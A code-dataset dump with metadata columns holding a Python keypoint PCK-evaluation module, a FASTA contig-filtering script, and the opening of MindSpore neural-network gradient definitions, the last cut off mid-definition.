hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f722ebb724af4503948aba102fe25a6ba9af7df5 | 11,171 | py | Python | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 52 | 2020-04-02T12:35:55.000Z | 2022-03-11T07:47:30.000Z | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 8 | 2020-06-04T07:34:34.000Z | 2021-09-18T21:17:26.000Z | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 6 | 2020-07-12T02:12:18.000Z | 2021-03-06T05:03:33.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
'''
intervals : Define thresholds to evaluate pck score
kpnames : Keypoint names
bench_stats : stats
'''
def remove_nans(x):
    """Return a copy of the 1-D array *x* with all NaN entries dropped."""
    keep_mask = np.logical_not(np.isnan(x))
    return x[keep_mask]
def pck_at_intervals(intervals, error):
    """Return, for each threshold in *intervals*, the fraction of values in
    *error* that fall strictly below it (rounded to 3 decimals)."""
    err_arr = np.array(error)
    return [float(np.round(np.mean(err_arr < thresh), 3)) for thresh in intervals]
def ck_at_interval(intervals, error):
    """Return a list of boolean arrays, one per threshold in *intervals*,
    marking which entries of *error* are below that threshold.
    Shape: len(intervals) x error.shape."""
    err_arr = np.array(error)
    return [err_arr < thresh for thresh in intervals]
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
    """Compute per-keypoint error statistics and PCK accuracies.

    Args:
        intervals: PCK thresholds, expressed as fractions of img_size.
        kpnames: keypoint names, one per column of bench_stats['kps_err'].
        bench_stats: dict with 'kps_err' of shape (N, n_kps, >=2); channel 0
            is the pixel error, channel 1 a validity flag.
        img_size: normalization factor for the pixel errors.

    Returns:
        dict with mean/median/std errors, sorted per-keypoint error samples,
        PCK at `intervals`, and a dense accuracy curve for plotting.
    """
    stats = {}
    plot_intervals = [0.025 * i for i in range(40)]
    kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
    # Mask invalid keypoints (flag < 0.5) with NaN so the nan-aware
    # reductions below and remove_nans() skip them.  (Previously this
    # assigned the string 'nan' and left a pdb.set_trace() breakpoint.)
    kp_error_nan_mask[kp_error_nan_mask < 0.5] = np.nan
    bench_stats_kps_err = bench_stats['kps_err'] / img_size
    mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
    stats['mean_kp_err'] = [
        float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
    ]
    stats['median_kp_err'] = [
        float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
    ]
    stats['std_kp_err'] = [
        float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
    ]
    stats['data'] = {}
    stats['pck'] = {}
    stats['interval'] = intervals
    stats['kp_names'] = kpnames
    stats['eval_params'] = {}
    for kpx, kp_name in enumerate(kpnames):
        # Sorted, NaN-free error samples for this keypoint.
        stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
        stats['data'][kp_name].sort()
        stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
        stats['pck'][kp_name] = pck_at_intervals(
            intervals, stats['data'][kp_name]
        )
        stats['eval_params'][kp_name] = {}
        stats['eval_params'][kp_name]['thresh'] = plot_intervals
        stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
            plot_intervals, stats['data'][kp_name]
        )
    return stats
def benchmark_all_instances_2(
    intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
    """Per-keypoint PCK stats plus pooled (instance-average) accuracies.

    Same as `benchmark_all_instances`, additionally reporting a pooled
    accuracy over all keypoints and, optionally, per keypoint group.

    Args:
        intervals: PCK thresholds, expressed as fractions of img_size.
        kpnames: keypoint names, one per column of bench_stats['kps_err'].
        bench_stats: dict with 'kps_err' of shape (N, n_kps, >=2); channel 0
            is the pixel error, channel 1 a validity flag.
        img_size: normalization factor for the pixel errors.
        select_kp_ids: optional {group_name: [kp indices]} mapping; a pooled
            accuracy is reported per group under '<group>_acc'.
    """
    stats = {}
    plot_intervals = [0.025 * i for i in range(40)]
    kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
    # Mask invalid keypoints (flag < 0.5) with NaN so the nan-aware
    # reductions and remove_nans() skip them.  (Previously assigned the
    # string 'nan', which relies on implicit float parsing.)
    kp_error_nan_mask[kp_error_nan_mask < 0.5] = np.nan
    bench_stats_kps_err = bench_stats['kps_err'] / img_size
    mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
    stats['mean_kp_err'] = [
        float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
    ]
    stats['median_kp_err'] = [
        float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
    ]
    stats['std_kp_err'] = [
        float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
    ]
    stats['data'] = {}
    stats['pck'] = {}
    stats['interval'] = intervals
    stats['kp_names'] = kpnames
    stats['eval_params'] = {}
    for kpx, kp_name in enumerate(kpnames):
        stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
        stats['data'][kp_name].sort()
        stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
        stats['pck'][kp_name] = pck_at_intervals(
            intervals, stats['data'][kp_name]
        )
        stats['eval_params'][kp_name] = {}
        stats['eval_params'][kp_name]['thresh'] = plot_intervals
        stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
            plot_intervals, stats['data'][kp_name]
        )
    if select_kp_ids is not None:
        # Pooled accuracy per named keypoint group.
        for group_name in select_kp_ids.keys():
            kp_ids = select_kp_ids[group_name]
            select_kp_error = mean_kp_error[:, kp_ids]
            samples = remove_nans(select_kp_error.reshape(-1))
            stats['eval_params'][
                '{}_acc'.format(group_name)
            ] = pck_at_intervals(intervals, samples.tolist())
    # Pooled accuracy over all keypoints of all instances.
    samples = remove_nans(mean_kp_error.reshape(-1))
    stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
    return stats
def benchmark_vis_instances(
    intervals, dist_thresholds, kpnames, bench_stats, img_size
):
    """PCK evaluation gated by a per-keypoint distance/confidence score.

    For each threshold in `dist_thresholds`, a transferred keypoint counts
    as correct when it is valid, its score (channel 2) is below the
    threshold, and its normalized error is below the PCK interval; points
    visible in image 1 but not image 2 count as correct when they are
    (rightly) rejected by the threshold.

    Returns:
        dict whose 'eval_params'[dx]['acc'] is a (n_kps, n_intervals)
        accuracy matrix for distance threshold index dx.
    """
    stats = {}
    stats['data'] = {}
    stats['eval_params'] = {}
    stats['pck'] = {}
    stats['interval'] = intervals
    bench_stats_kps_error = 1 * bench_stats['kps_err']
    bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
    ndata_points, nkps, _ = bench_stats['kps_err'].shape
    # A keypoint is treated as visible when its third channel exceeds 200.
    kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
    kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
    # Epsilon avoids division by zero for keypoints never visible.
    stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
    for dx, dist_thresh in enumerate(dist_thresholds):
        stats['eval_params'][dx] = {}
        stats['eval_params'][dx]['correct'] = np.zeros(
            (len(kpnames), len(intervals))
        )
        for kpx, kp_name in enumerate(kpnames):
            valid_inds = np.where(
                bench_stats_kps_error[:, kpx, 2] < dist_thresh
            )[0].tolist()
            common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
                                   )[0].tolist()
            valid_inds = set(valid_inds)
            common_inds = set(common_inds)
            ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
            ck = np.stack(ck, axis=1)
            # Keypoints both valid and accepted by the distance threshold.
            ex = np.array(list(common_inds & valid_inds))
            if len(ex) > 0:
                stats['eval_params'][dx]['correct'][kpx] += np.sum(
                    ck[ex, :], axis=0
                )
            kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
            kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
            # np.int was removed in NumPy >= 1.24; use an explicit dtype.
            ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
                          ).astype(np.int64)
            if len(ex) > 0:
                # Visible-in-1-only points are correct when rejected.
                stats['eval_params'][dx]['correct'][kpx] += np.sum(
                    bench_stats_kps_error[ex, kpx, 2] > dist_thresh
                )
        stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
            stats['eval_params']['total'].reshape(-1, 1)
    return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
    """Flatten per-keypoint transfer results into labels for PR evaluation.

    Builds, over all keypoints and instances, the per-prediction correctness
    labels (one column per PCK interval), the ground-truth labels, and the
    prediction scores expected by `evaluate_pr.inst_bench_evaluate`.
    """
    bench_stats_kps_error = bench_stats['kps_err'] * 1
    bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
    prediction_error = []  # N x 1
    prediction_score = []  # N x 1
    prediction_label = []  # N x len(intervals)
    gt_label = []
    # A keypoint is treated as visible when its third channel exceeds 200.
    kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
    kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
    for kpx, kp_name in enumerate(kp_names):
        common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
                               )[0].tolist()
        ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
        ck = np.stack(ck, axis=1)
        ex = np.array(list(common_inds))
        if len(ex) > 0:
            # Keypoint visible in both images: positive ground truth,
            # predicted label is whether the error beats each interval.
            prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
            prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
            prediction_label.append(ck[ex, :] * 1)
            gt_label.append(ck[ex, :] * 0 + 1)
        kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
        kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
        # np.int was removed in NumPy >= 1.24; use an explicit dtype.
        ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
                      ).astype(np.int64)
        if len(ex) > 0:
            # Visible only in image 1: negative ground truth and label.
            prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
            prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
            prediction_label.append(ck[ex, :] * 0)
            gt_label.append(ck[ex, :] * 0)
    prediction_error = np.concatenate(prediction_error, axis=0)
    prediction_score = np.concatenate(prediction_score, axis=0)
    prediction_label = np.concatenate(prediction_label, axis=0)
    gt_label = np.concatenate(gt_label, axis=0)
    stats = {}
    stats['pred_label'] = prediction_label
    stats['gt_label'] = gt_label
    stats['score'] = prediction_score  # lower the score better it is.
    return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
# kp_eval_thresholds = [0.05, 1.0]
'''
select_kp_ids dict is a group of kp points
'''
def run_evaluation(
    bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
    select_kp_ids
):
    """Run the full PCK evaluation, print summaries, and dump results.

    Writes per-keypoint stats to `stats_m1_<n_iter>.json` and, when
    `dist_thresholds` is given, precision/recall stats to `pr_<n_iter>.mat`
    in `results_dir`.  Returns the last computed stats dict.
    """
    json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
    stats_m1 = benchmark_all_instances_2(
        kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
    )
    stats = stats_m1
    print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
    # zip() is lazy on Python 3; materialize it so pprint shows the rows
    # instead of '<zip object at 0x...>'.
    pprint.pprint(
        list(zip(
            stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
            stats['std_kp_err']
        ))
    )
    print('PCK Values')
    pprint.pprint(stats['interval'])
    pprint.pprint(stats['pck'])
    # Average the per-keypoint PCK at every threshold.
    mean_pck = {}
    for i, thresh in enumerate(stats['interval']):
        mean_pck[thresh] = []
        for kp_name in kp_names:
            mean_pck[thresh].append(stats['pck'][kp_name][i])
    mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
    pprint.pprint('Mean PCK ')
    pprint.pprint(mean_pck)
    print('Instance Average **** ')
    pprint.pprint(stats['eval_params']['acc'])
    for group_name in select_kp_ids.keys():
        print('Instance Average {} **** '.format(group_name))
        pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
    print('########################## ')
    with open(json_file, 'w') as f:
        json.dump(stats, f)
    if dist_thresholds is not None:
        stats_m1 = benchmark_vis_instances(
            kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
        )
        stats = stats_m1
        mean_pck = {}
        for dx, _ in enumerate(dist_thresholds):
            mean_pck[dx] = {}
            for i, thresh in enumerate(stats['interval']):
                mean_pck[dx][thresh] = []
                for kx, kp_name in enumerate(kp_names):
                    mean_pck[dx][thresh].append(
                        stats['eval_params'][dx]['acc'][kx, i]
                    )
            mean_pck[dx] = {
                k: np.round(np.mean(np.array(t)), 4)
                for k, t in mean_pck[dx].items()
            }
        print('***** Distance Thresholds ***** ')
        pprint.pprint('Mean PCK Acc')
        pprint.pprint(mean_pck)
        # Precision/recall over all transferred keypoints.
        stats = collate_all_instances(
            kp_eval_thresholds, kp_names, bench_stats, img_size
        )
        pr_stats = evaluate_pr.inst_bench_evaluate(
            stats['pred_label'], stats['gt_label'], stats['score']
        )
        pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
        sio.savemat(pr_mat_file, pr_stats)
    return stats_m1
| 35.919614 | 94 | 0.598872 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
def remove_nans(x):
return x[~np.isnan(x)]
def pck_at_intervals(intervals, error):
accuracy = []
for interval in intervals:
accuracy.append(float(np.round(np.mean(np.array(error) < interval), 3)))
return accuracy
def ck_at_interval(intervals, error):
cks = []
for interval in intervals:
cks.append(np.array(error) < interval)
return cks
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
pdb.set_trace()
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
return stats
def benchmark_all_instances_2(
intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
if select_kp_ids is not None:
for group_name in select_kp_ids.keys():
kp_ids = select_kp_ids[group_name]
select_kp_error = mean_kp_error[:, kp_ids]
samples = remove_nans(select_kp_error.reshape(-1))
stats['eval_params'][
'{}_acc'.format(group_name)
] = pck_at_intervals(intervals, samples.tolist())
samples = remove_nans(mean_kp_error.reshape(-1))
stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
return stats
def benchmark_vis_instances(
intervals, dist_thresholds, kpnames, bench_stats, img_size
):
stats = {}
stats['data'] = {}
stats['eval_params'] = {}
stats['pck'] = {}
stats['interval'] = intervals
bench_stats_kps_error = 1 * bench_stats['kps_err']
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
ndata_points, nkps, _ = bench_stats['kps_err'].shape
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
for dx, dist_thresh in enumerate(dist_thresholds):
stats['eval_params'][dx] = {}
stats['eval_params'][dx]['correct'] = np.zeros(
(len(kpnames), len(intervals))
)
for kpx, kp_name in enumerate(kpnames):
valid_inds = np.where(
bench_stats_kps_error[:, kpx, 2] < dist_thresh
)[0].tolist()
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
valid_inds = set(valid_inds)
common_inds = set(common_inds)
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds & valid_inds))
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
ck[ex, :], axis=0
)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
bench_stats_kps_error[ex, kpx, 2] > dist_thresh
)
stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
stats['eval_params']['total'].reshape(-1, 1)
return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
bench_stats_kps_error = bench_stats['kps_err'] * 1
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
prediction_error = []
prediction_score = []
prediction_label = []
gt_label = []
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
for kpx, kp_name in enumerate(kp_names):
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds))
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 1)
gt_label.append(ck[ex, :] * 0 + 1)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 0)
gt_label.append(ck[ex, :] * 0)
prediction_error = np.concatenate(prediction_error, axis=0)
prediction_score = np.concatenate(prediction_score, axis=0)
prediction_label = np.concatenate(prediction_label, axis=0)
gt_label = np.concatenate(gt_label, axis=0)
stats = {}
stats['pred_label'] = prediction_label
stats['gt_label'] = gt_label
stats['score'] = prediction_score
return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
def run_evaluation(
bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
select_kp_ids
):
json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
stats_m1 = benchmark_all_instances_2(
kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
)
stats = stats_m1
print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
pprint.pprint(
zip(
stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
stats['std_kp_err']
)
)
print('PCK Values')
pprint.pprint(stats['interval'])
pprint.pprint(stats['pck'])
mean_pck = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[thresh] = []
for kp_name in kp_names:
mean_pck[thresh].append(stats['pck'][kp_name][i])
mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
pprint.pprint('Mean PCK ')
pprint.pprint(mean_pck)
print('Instance Average **** ')
pprint.pprint(stats['eval_params']['acc'])
for group_name in select_kp_ids.keys():
print('Instance Average {} **** '.format(group_name))
pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
print('########################## ')
with open(json_file, 'w') as f:
json.dump(stats, f)
if dist_thresholds is not None:
stats_m1 = benchmark_vis_instances(
kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
)
stats = stats_m1
mean_pck = {}
for dx, thresh in enumerate(dist_thresholds):
mean_pck[dx] = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[dx][thresh] = []
for kx, kp_name in enumerate(kp_names):
mean_pck[dx][thresh].append(
stats['eval_params'][dx]['acc'][kx, i]
)
mean_pck[dx] = {
k: np.round(np.mean(np.array(t)), 4)
for k, t in mean_pck[dx].items()
}
print('***** Distance Thresholds ***** ')
pprint.pprint('Mean PCK Acc')
pprint.pprint(mean_pck)
stats = collate_all_instances(
kp_eval_thresholds, kp_names, bench_stats, img_size
)
pr_stats = evaluate_pr.inst_bench_evaluate(
stats['pred_label'], stats['gt_label'], stats['score']
)
pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
sio.savemat(pr_mat_file, pr_stats)
return stats_m1
| true | true |
f722ec22feb4a0e855ee2c090316f8719c6ae702 | 713 | py | Python | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | import gzip
import natsort
from Bio import SeqIO
def get_target(infile: str, outfile) -> None:
    """Write naturally-sorted names of large autosomal super-scaffolds.

    Reads a FASTA file (gzip-compressed unless it ends in ``.fasta``) and
    keeps contigs that are named ``Super*``/``SUPER*``, are not unlocalized
    (no ``unloc`` in the name), do not end in a sex-chromosome letter
    (W/X/Y/Z), and are longer than 1 Mb.  One contig name per line is
    written to *outfile* (an open, writable text handle).
    """
    contig_hsh = {}
    SEX_CHROMOSOME = ("W", "X", "Y", "Z")
    # Transparently handle plain or gzip-compressed FASTA input.
    handle = infile if infile.endswith(".fasta") else gzip.open(infile, "rt")
    for record in SeqIO.parse(handle, "fasta"):
        contig = record.id
        contig_length = len(record.seq)
        if (
            contig.startswith(("Super", "SUPER"))
            and "unloc" not in contig               # skip unlocalized scaffolds
            and not contig.endswith(SEX_CHROMOSOME)
            and contig_length > 1000000             # keep only contigs > 1 Mb
        ):
            contig_hsh[contig] = contig_length
    # Natural sort so e.g. SUPER_2 precedes SUPER_10.
    for contig in natsort.natsorted(list(contig_hsh.keys())):
        outfile.write("{}\n".format(contig))
| 37.526316 | 164 | 0.663394 | import gzip
import natsort
from Bio import SeqIO
def get_target(infile: str, outfile) -> None:
contig_hsh = {}
SEX_CHROMOSOME = ("W", "X", "Y", "Z")
sequences = SeqIO.parse(infile, "fasta") if infile.endswith(".fasta") else SeqIO.parse(gzip.open(infile, "rt"), "fasta")
for i in sequences:
contig = i.id
contig_length = len(i.seq)
if (contig.startswith("Super") or contig.startswith("SUPER")) and not "unloc" in contig and not contig.endswith(SEX_CHROMOSOME) and contig_length > 1000000:
contig_hsh[contig] = contig_length
contig_lst = natsort.natsorted(list(contig_hsh.keys()))
for contig in contig_lst:
outfile.write("{}\n".format(contig))
| true | true |
f722ec49b89c5a27a174dc656de3e484cbe78278 | 39,113 | py | Python | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | 4 | 2021-01-26T09:14:01.000Z | 2021-01-26T09:17:24.000Z | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define the grad rules of neural network related operations."""
import os
import numpy as np
from mindspore.ops import _selected_grad_ops as SG
from mindspore.ops.primitive import constexpr
from mindspore.common.tensor import Tensor
from mindspore.ops.operations import nn_ops as nps
from .grad_base import bprop_getters
from .. import functional as F
from .. import operations as P
from ...common import dtype as mstype
from ..composite.multitype_ops.zeros_like_impl import zeros_like
from ..operations import _grad_ops as G
from ..operations import _inner_ops as inner
from ... import context
env_force_bprop_seq = os.getenv("ENV_FORCE_BPROP_SEQ")
@bprop_getters.register(P.BiasAdd)
def get_bprop_bias_add(self):
    """Grad definition for `BiasAdd` operation."""
    grad_bias = SG.BiasAddGrad(self.data_format)

    def bprop(x, w, out, dout):
        # The input gradient is dout unchanged; the bias gradient reduces
        # dout over the non-channel axes.
        return dout, grad_bias(dout)

    return bprop
@bprop_getters.register(P.Conv2D)
def get_bprop_conv2d(self):
    """Grad definition for `Conv2D` operation.

    Returns a bprop(x, w, out, dout) closure producing (dx, dw) via the
    dedicated backprop-input / backprop-filter primitives, configured with
    the same hyper-parameters as the forward op.
    """
    # Gradient w.r.t. the input feature map.
    input_grad = P.Conv2DBackpropInput(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    # Gradient w.r.t. the convolution filter.
    filter_grad = G.Conv2DBackpropFilter(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    get_shape = P.Shape()

    def bprop(x, w, out, dout):
        dx = input_grad(dout, w, get_shape(x))
        if env_force_bprop_seq == '1':
            # ENV_FORCE_BPROP_SEQ=1 forces dw to be computed after dx by
            # inserting a data dependency on dx.
            x = F.depend(x, dx)
        dw = filter_grad(dout, x, get_shape(w))
        return dx, dw

    return bprop
@bprop_getters.register(nps.Conv3D)
def get_bprop_conv3d(self):
    """Grad definition for `Conv3D` operation.

    Returns a bprop(x, w, out, dout) closure producing (dx, dw).
    """
    # Gradient w.r.t. the input volume.
    input_grad = nps.Conv3DBackpropInput(
        self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
